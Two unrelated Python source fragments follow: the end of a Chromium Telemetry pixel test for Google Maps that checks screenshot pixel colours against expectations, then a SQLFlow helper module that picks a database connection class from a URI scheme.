        """ % iterations

        def IsWaitComplete():
            return tab.EvaluateJavaScript('window.__spinWaitOnRAFDone')

        tab.ExecuteJavaScript(waitScript)
        util.WaitFor(IsWaitComplete, timeout)

    def _ReadPixelExpectations(self, page):
        # Expectations live in a JSON file referenced by the page definition.
        expectations_path = os.path.join(
            page._base_dir, page.pixel_expectations)
        with open(expectations_path, 'r') as f:
            json_contents = json.load(f)
        return json_contents

    def _CompareToExpectations(self, screenshot, expectations,
                               devicePixelRatio):
        """Check each expected pixel; raise page_test.Failure on mismatch."""
        for expectation in expectations:
            location = expectation["location"]
            x = location[0] * devicePixelRatio
            y = location[1] * devicePixelRatio

            # NOTE(review): boundary test uses '>' rather than '>='; a pixel
            # exactly at width/height would pass this check but be out of
            # bounds -- confirm whether expectations can ever land there.
            if x < 0 or y < 0 or x > screenshot.width or \
                    y > screenshot.height:
                raise page_test.Failure(
                    'Expected pixel location [%d, %d] is out of range on '
                    '[%d, %d] image' %
                    (x, y, screenshot.width, screenshot.height))

            pixel_color = screenshot.GetPixelColor(x, y)
            expect_color = bitmap.RgbaColor(
                expectation["color"][0],
                expectation["color"][1],
                expectation["color"][2])
            iter_result = pixel_color.IsEqual(
                expect_color, expectation["tolerance"])
            if not iter_result:
                raise page_test.Failure('Expected pixel at ' + str(location) +
                    ' to be ' + str(expectation["color"]) + " but got [" +
                    str(pixel_color.r) + ", " +
                    str(pixel_color.g) + ", " +
                    str(pixel_color.b) + "]")


class Maps(cloud_storage_test_base.TestBase):
    """Google Maps pixel tests."""
    # Telemetry test-harness hook: which validator class to run.
    test = MapsValidator

    @staticmethod
    def AddTestCommandLineOptions(parser):
        group = optparse.OptionGroup(parser, 'Maps test options')
        cloud_storage_test_base.TestBase._AddTestCommandLineOptions(
            parser, group)
        parser.add_option_group(group)

    def CreateExpectations(self, page_set):
        return maps_expectations.MapsExpectations()

    def CreatePageSet(self, options):
        # The page set is built in code (not from a JSON file on disk).
        page_set_path = os.path.join(
            util.GetChromiumSrcDir(), 'content', 'test', 'gpu', 'page_sets')
        page_set_dict = {
            'archive_data_file': 'data/maps.json',
            'make_javascript_deterministic': False,
            'pages': [
                {
                    'name': 'Maps.maps_001',
                    'url': 'http://localhost:10020/tracker.html',
                    # TODO: Hack to prevent maps from scaling due to window
                    # size. Remove when the maps team provides a better way of
                    # overriding this behavior
                    'script_to_evaluate_on_commit': 'window.screen = null;',
                    'navigate_steps': [
                        {'action': 'navigate'},
                        {'action': 'wait', 'javascript': 'window.testDone'}
                    ],
                    'pixel_expectations': 'data/maps_001_expectations.json'
                }
            ]
        }
        return page_set.PageSet.FromDict(page_set_dict, page_set_path)
# Copyright 2020 The SQLFlow Authors. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License

# NOTE(sneaxiy): do not import the XxxConnection object outside the
# following method. It is because those imports are quite slow (about 1-2s),
# making that the normal SQL statement runs very slow.


def get_connection_object(driver):
    """Return the Connection class registered for the given driver name.

    The driver modules are imported lazily (see NOTE above) so that code
    paths which never open a connection do not pay their import cost.

    Args:
        driver: driver name, one of "mysql", "hive", "maxcompute", "paiio".

    Returns:
        The Connection class (not an instance) for the driver.

    Raises:
        ValueError: if the driver name is not supported.
    """
    if driver == "mysql":
        from runtime.dbapi.mysql import MySQLConnection
        return MySQLConnection
    elif driver == "hive":
        from runtime.dbapi.hive import HiveConnection
        return HiveConnection
    elif driver == "maxcompute":
        from runtime.dbapi.maxcompute import MaxComputeConnection
        return MaxComputeConnection
    elif driver == "paiio":
        from runtime.dbapi.paiio import PaiIOConnection
        return PaiIOConnection
    else:
        raise ValueError("unsupported driver type %s" % driver)


def connect(uri):
    """Connect to given uri

    Params:
      uri: a valid URI string, e.g. "mysql://user:pass@host:3306/db"

    Returns:
      A Connection object

    Raises:
      ValueError if the uri is not valid or can't find given driver
    """
    # Only the scheme is needed here; maxsplit=1 tolerates "://" appearing
    # again later in the URI (e.g. inside a parameter value).
    parts = uri.split("://", 1)
    if len(parts) < 2:
        # BUG FIX: previously raised ValueError("...", uri) with two args,
        # which renders as a tuple; format one message instead, consistent
        # with the error style in get_connection_object().
        raise ValueError("Input should be a valid uri: %s" % uri)
    return get_connection_object(parts[0])(uri)